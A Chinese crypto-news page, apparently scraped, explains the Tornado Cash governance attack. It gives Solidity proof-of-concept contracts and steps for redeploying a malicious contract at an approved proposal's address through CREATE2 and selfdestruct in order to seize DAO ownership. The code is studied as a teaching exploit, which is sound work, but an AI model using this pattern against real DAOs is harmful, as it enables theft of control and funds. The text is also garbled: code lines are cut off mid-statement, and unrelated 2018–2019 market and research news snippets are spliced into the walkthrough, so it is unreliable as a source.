解析Tornado治理攻击：如何同一个地址上部署不同的合约_BSP:SALE

大概两周前（5 月 20 日），知名混币协议 Tornado Cash 遭受到治理攻击，黑客获取到了Tornado Cash的治理合约的控制权（Owner）。

攻击过程是这样的：攻击者先提交了一个“看起来正常”的提案， 待提案通过之后， 销毁了提案要执行的合约地址， 并在该地址上重新创建了一个攻击合约。

攻击过程可以查看 SharkTeam 的  Tornado

   address public owner = msg

   function execute(uint256 proposalId) external payable {        Proposal storage proposal = proposals[proposalId];        require(proposal

}contract Proposal {    event Log(string message);    function executeProposal() external {        emit Log("Excuted code approved by DAO");    }    function emergencyStop() external {        selfdestruct(payable(address(0)));    }}contract Attack {    event Log(string message);    address public owner;    function executeProposal() external {        emit Log("Excuted code not approved by DAO :)");        // For example - set DAO's owner to attacker        owner = msg

}contract DeployerDeployer {    event Log(address addr);    function deploy() external {        bytes32 salt = keccak256(abi

}contract Deployer {    event Log(address addr);    function deployProposal() external {        address addr = address(new Proposal());        emit Log(addr);    }    function deployAttack() external {        address addr = address(new Attack());        emit Log(addr);    }    function kill() external {        selfdestruct(payable(address(0)));    }}大家可以使用该代码自己在 Remix 中演练一下。

分析 | 资金流入榜首DASH盘面解析:在过去24小时中，DASH在各主流币中非常强势，资金净流入31.97亿人民币。从图中可以看出，DASH目前4小时走势处于上升楔形三角中，底部不断抬高，100均线上穿长期200均线，表明近期压力位将会上移，并且MA100和MA 200将会对币价起到支撑作用，不过目前两均线的缺口在收窄，说明近期上冲动能在逐步减弱，RSI显示进入超买区域，短期有回撤蓄势的需求，上方压力95，下方支撑89，收盘若站稳89上方，还会有上涨空间，反之币价可能回撤至三角底部$75附近寻求支撑。利好消息面，区块链支付服务PolisPay宣布与Dash合作，将支持其万事达卡借记卡。[2019/3/13]

首先部署 DeployerDeployer ， 调用 DeployerDeployer.deploy() 部署 Deployer ， 然后调用   Deployer.deployProposal()  部署  Proposal 。

拿到 Proposal 提案合约地址后， 向  DAO 发起提案。

分别调用 Deployer.kill 和  Proposal.emergencyStop 销毁掉 Deployer 和 Proposal

再次调用 DeployerDeployer.deploy() 部署 Deployer ， 调用 Deployer.deployAttack() 部署  Attack ，    Attack  将和之前的   Proposal 一致。

动态 | 浙江大学携手剑桥大学发布区块链生态深层解析报告:近期，浙江大学互联网金融研究院携手剑桥大学新兴金融研究中心发布区块链生态深层解析报告《Distributed Ledger Technology Systems-A Conceptual Framework》的中文版——《分布式账本技术系统:一个概念框架》。浙大AIF副院长杨小虎指出，该报告不仅阐明了如何识别DLT系统，分析和比较现有的DLT系统，还通过六个实例为新系统设计提供有用的借鉴。[2018/8/17]

执行 DAO.execute 时，攻击完成 获取到了 DAO 的 Owner 权限。

区块律动BlockBeats

曼昆区块链法律

Foresight News

GWEI Research

吴说区块链

西柚yoga

ETH中文

金色早8点

金色财经 子木

ABCDE

0xAyA

郑重声明： 本文版权归原作者所有， 转载文章仅为传播更多信息之目的， 如作者信息标记有误， 请第一时间联系我们修改或删除， 多谢。